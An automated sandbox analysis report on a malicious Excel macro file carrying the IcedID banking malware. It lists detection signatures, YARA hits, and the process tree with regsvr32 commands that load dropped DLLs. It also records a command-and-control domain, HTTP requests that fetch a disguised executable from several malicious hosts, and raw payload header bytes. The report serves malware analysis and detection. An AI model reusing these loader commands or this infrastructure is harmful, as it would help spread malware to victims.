
Windows Analysis Report LL52387-01M4205301.xlsm

Overview

General Information

Sample Name: LL52387-01M4205301.xlsm
Analysis ID: 444806
MD5: f45c798d44794fc75c16d6aac22b1e83
SHA1: 6519f4988344c90ac3680dd910dc739f5ce7c442
SHA256: f5472b197dc1ffb19095d59d99696cf47c41b334a8d25b32b431a80bbf1bbd00
Tags: IcedID, xlsm

Detection

IcedID
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query network adapter information
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel document contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2388 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2384 cmdline: regsvr32 -silent ..\XRAY.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2380 cmdline: regsvr32 -silent ..\XTOWN.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2196 cmdline: regsvr32 -silent ..\XZIBIT.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara Overview

PCAP (Network Traffic)

Source: dump.pcap | Rule: JoeSecurity_IcedID_1 | Description: Yara detected IcedID | Author: Joe Security

Memory Dumps

Source: 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmp | Rule: JoeSecurity_IcedID_1 | Description: Yara detected IcedID | Author: Joe Security
Source: 00000004.00000002.2104111082.0000000000190000.00000004.00000001.sdmp | Rule: MAL_IcedID_GZIP_LDR_202104 | Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Author: Thomas Barabosch, Telekom Security
  • 0x27c6:$internal_name: loader_dll_64.dll
  • 0x30b4:$string0: _gat=
  • 0x3114:$string1: _ga=
  • 0x30ec:$string2: _gid=
  • 0x30cc:$string3: _u=
  • 0x3026:$string4: _io=
  • 0x30d8:$string5: GetAdaptersInfo
  • 0x2b16:$string6: WINHTTP.dll
  • 0x27ea:$string7: DllRegisterServer
  • 0x27fc:$string8: PluginInit
  • 0x3080:$string9: POST
  • 0x3140:$string10: aws.amazon.com
Source: Process Memory Space: regsvr32.exe PID: 2380 | Rule: JoeSecurity_IcedID_1 | Description: Yara detected IcedID | Author: Joe Security

Unpacked PEs

Source: 4.2.regsvr32.exe.190000.0.unpack | Rule: MAL_IcedID_GZIP_LDR_202104 | Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Author: Thomas Barabosch, Telekom Security
  • 0x1bc6:$internal_name: loader_dll_64.dll
  • 0x1f16:$string6: WINHTTP.dll
  • 0x1bea:$string7: DllRegisterServer
  • 0x1bfc:$string8: PluginInit
Source: 4.2.regsvr32.exe.190000.0.raw.unpack | Rule: MAL_IcedID_GZIP_LDR_202104 | Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Author: Thomas Barabosch, Telekom Security
  • 0x27c6:$internal_name: loader_dll_64.dll
  • 0x30b4:$string0: _gat=
  • 0x3114:$string1: _ga=
  • 0x30ec:$string2: _gid=
  • 0x30cc:$string3: _u=
  • 0x3026:$string4: _io=
  • 0x30d8:$string5: GetAdaptersInfo
  • 0x2b16:$string6: WINHTTP.dll
  • 0x27ea:$string7: DllRegisterServer
  • 0x27fc:$string8: PluginInit
  • 0x3080:$string9: POST
  • 0x3140:$string10: aws.amazon.com
Source: 4.2.regsvr32.exe.1b0000.1.unpack | Rule: MAL_IcedID_GZIP_LDR_202104 | Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Author: Thomas Barabosch, Telekom Security
  • 0x27c6:$internal_name: loader_dll_64.dll
  • 0x30bc:$string0: _gat=
  • 0x311c:$string1: _ga=
  • 0x30f4:$string2: _gid=
  • 0x30d4:$string3: _u=
  • 0x302e:$string4: _io=
  • 0x30e0:$string5: GetAdaptersInfo
  • 0x2b16:$string6: WINHTTP.dll
  • 0x27ea:$string7: DllRegisterServer
  • 0x27fc:$string8: PluginInit
  • 0x3088:$string9: POST
  • 0x3148:$string10: aws.amazon.com

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: regsvr32 -silent ..\XRAY.dll, CommandLine: regsvr32 -silent ..\XRAY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2388, ProcessCommandLine: regsvr32 -silent ..\XRAY.dll, ProcessId: 2384

        Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 4.2.regsvr32.exe.190000.0.raw.unpack | Malware Configuration Extractor: IcedID {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}
Yara detected IcedID
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 2380, type: MEMORY
Source: unknown | HTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\XTOWN.dll
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: lsdfik[1].fml.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe
Source: global traffic | DNS query: name: thousandsyears.download
Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 13.224.92.73:443
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 172.67.198.51:80

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: astrocycle.download
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 200 OK
    Date: Tue, 06 Jul 2021 15:49:53 GMT
    Content-Type: application/octet-stream
    Content-Length: 57856
    Connection: keep-alive
    Content-Disposition: attachment; filename=lsdfik.fml
    Cache-Control: max-age=14400
    CF-Cache-Status: HIT
    Age: 6801
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=%2BDNChGJ59YNjBFqZa4TKC4pQsxnL7NdGF%2B60x6I5VvFXRTOmismddTlrNVyVond1jowHhLHRmejjuZTFiFP3ft4aoDN5DaqrJgjCHBHKwv4qBt4fxYB8wmsYcw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 66a9fc531afd2c22-FRA
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00
    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Connection: Keep-Alive
    Cookie: __gads=3565085024:1:5640:53; _gat=6.1.7601.64; _ga=1.329303.0.4; _u=373135353735:416C627573:38443943323244313446374646354435; __io=0; _gid=67AFEDC5AC03
    Host: astrocycle.download
Source: Joe Sandbox View | IP Address: 172.67.198.51
Source: Joe Sandbox View | IP Address: 13.224.92.73
Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global traffic | HTTP traffic detected:
    GET /div/44376,8555986111.jpg HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: thousandsyears.download
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /div/44376,8555986111.jpg HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: voopeople.fun
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /div/44376,8555986111.jpg HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: uppercilio.fun
    Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\24A691BB.png
Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp | String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp | String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
Source: regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp | String found in binary or memory: https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southeast-1.amazonaws.com https://www.buzzsprout.com; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://a0.awsstatic.com https://amazonwebservicesinc.tt.omtrdc.net https://googleads.g.doubleclick.net https://static.doubleclick.net https://website.spot.ec2.aws.a2z.com https://www.google.com https://www.gstatic.com; style-src 'self' 'unsafe-inline' https://a0.awsstatic.com; report-uri https://prod-us-west-2.csp-report.marketing.aws.dev/submit equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmp | String found in binary or memory: Content-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com
https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0. equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmp | String found in binary or memory: Content-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com
https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0. equals www.youtube.com (Youtube)
Source: regsvr32.exe, 00000004.00000003.2100828150.00000000002B4000.00000004.00000001.sdmp | String found in binary or memory: Content-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com
https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservice
Source: regsvr32.exe, 00000004.00000002.2106683153.0000000003090000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp | String found in binary or memory: X-Amz-Cf-IdeaQqc8iBLxpWxiD2WtTR8e1VwSVwXFlnjVHZWquCo3TDJPScneKUqQ==X-Amz-Cf-PopZRH50-C1X-CacheMiss from cloudfrontPermissions-Policyinterest-cohort=()Content-Security-Policy-Report-Onlydefault-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com
https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.c
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmpString found in binary or memory: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net 
https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net 